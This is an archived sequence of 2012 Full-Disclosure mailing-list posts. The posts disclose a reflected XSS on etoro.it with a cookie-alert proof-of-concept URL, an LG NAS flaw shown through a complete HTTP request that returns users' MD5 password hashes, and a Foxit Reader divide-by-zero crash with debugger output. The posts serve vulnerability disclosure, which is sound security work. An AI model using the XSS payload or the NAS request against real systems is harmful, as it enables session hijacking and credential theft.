[Full-disclosure] etoro.it vulnerable to XSS
The famous online trading website is vulnerable to an XSS attack Poc: http://www.etoro.it/educazione/node/1008/10%22%20onMouseOver=%22alert%28document.cookie%29%22 Info: https://tig3rblog.wordpress.com/2012/09/29/etoro-it-vulnerable-to-xss/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] LG NAS Users and password hash disclosure
# Exploit Title: LG NAS Users and password hash disclosure # Date: 2012-09-29 # Vendor Homepage: http://www.lg.com/ # Version: = firmware_2660 # Tested on: N2B1 Network Storage # Vendor notification: Not notified due to the stupid nature of the vuln.. This vulnerability has been discovered on LG N2B1 Network Storage (NAS), but probably other products that use the same firmware may be affected. Any authenticated user, administrator or not, are able to retrive a list of current authorized users along with MD5 password hashes. The page /en/php/share_get_user_info.php is prone to disclose authorized users along with their MD5 hashed passwords to any authenticated user. Sample HTTP request: ### POST /en/php/share_get_user_info.php?t=any random number HTTP/1.1 Host: 192.168.0.1:8000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 14 Cookie: lgnas_language=en; show_filter=true; lgnas_web_menu=1; PHPSESSID=your session Pragma: no-cache Cache-Control: no-cache mode=FullList ### Sample HTTP response: ### HTTP/1.1 200 OK X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html; charset=utf-8 Date: Sat, 29 Sep 2012 06:51:02 GMT Server: lighttpd/1.4.20 Content-Length: 83 admin;21232f297a57a5a743894a0e4a801fc3;System Admin;;Default System Administrator: ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Foxit Reader suffers from Division By Zero
[image: Inline image 1] On Sat, Sep 29, 2012 at 4:01 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Title: Foxit Reader suffers from Division By Zero Version : 5.4.3.0920 Date : 2012-09-28 Vendor : http://www.foxitsoftware.com/ Impact : Med/High Contact : coolkaveh [at] rocketmail.com Twitter : @coolkaveh tested : XP SP3 # Bug : division by zero vulnerability during the handling of the pdf files. that will trigger a denial of service condition # (b34.f24): Integer divide-by-zero - code c094 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax= ebx= ecx= edx= esi= edi= eip=00558c8c esp=0012f928 ebp= iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010246 *** ERROR: Module load completed but symbols could not be loaded for FoxitReader_Lib_Full.exe FoxitReader_Lib_Full+0x158c8c: 00558c8c f7f7div eax,edi 0:000 r;!exploitable -v;q eax= ebx= ecx= edx= esi= edi= eip=00558c8c esp=0012f928 ebp= iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010246 FoxitReader_Lib_Full+0x158c8c: 00558c8c f7f7div eax,edi HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - Exception Faulting Address: 0x558c8c First Chance Exception Type: STATUS_INTEGER_DIVIDE_BY_ZERO (0xC094) Faulting Instruction:00558c8c div eax,edi Basic Block: 00558c8c div eax,edi Tainted Input Operands: ax, dx, eax, edi 00558c8e cmp dword ptr [esp+3ch],eax Tainted Input Operands: eax 00558c92 jae foxitreader_lib_full+0x158f06 (00558f06) Tainted Input Operands: CarryFlag Exception Hash (Major/Minor): 0x6461647c.0x64616453 Stack Trace: FoxitReader_Lib_Full+0x158c8c Instruction Address: 0x00558c8c Description: Integer Divide By Zero Short Description: DivideByZero Recommended Bug Title: Integer Divide By Zero starting at FoxitReader_Lib_Full+0x00158c8c (Hash=0x6461647c.0x64616453) # Proof of concept .pdf included. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Foxit Reader suffers from Division By Zero
On Sat, Sep 29, 2012 at 8:01 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Title: Foxit Reader suffers from Division By Zero Version : 5.4.3.0920 [...] division by zero vulnerability during the handling of the pdf files. that will trigger a denial of service condition [...] Proof of concept .pdf included. Confirmed with V5 Foxit Reader 5.4.3.0920 on WinXP Pro SP3 (though with a slightly different offset - 0015eb8c ... ASLR ?). Interestingly, NOT confirmed for Foxit Reader 4.3.1.0323 (the last version of the V4 Foxit Reader, which is the last version many people are comfortable with); with this version I get a dialog box stating format error: not a PDF or corrupted, and no crash. This is also on XP Pro SP3. Another reason to be disappointed with Foxit Reader V5 :) Cheers Nick Boyce -- You are in a maze of twisty little relative jumps, all alike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/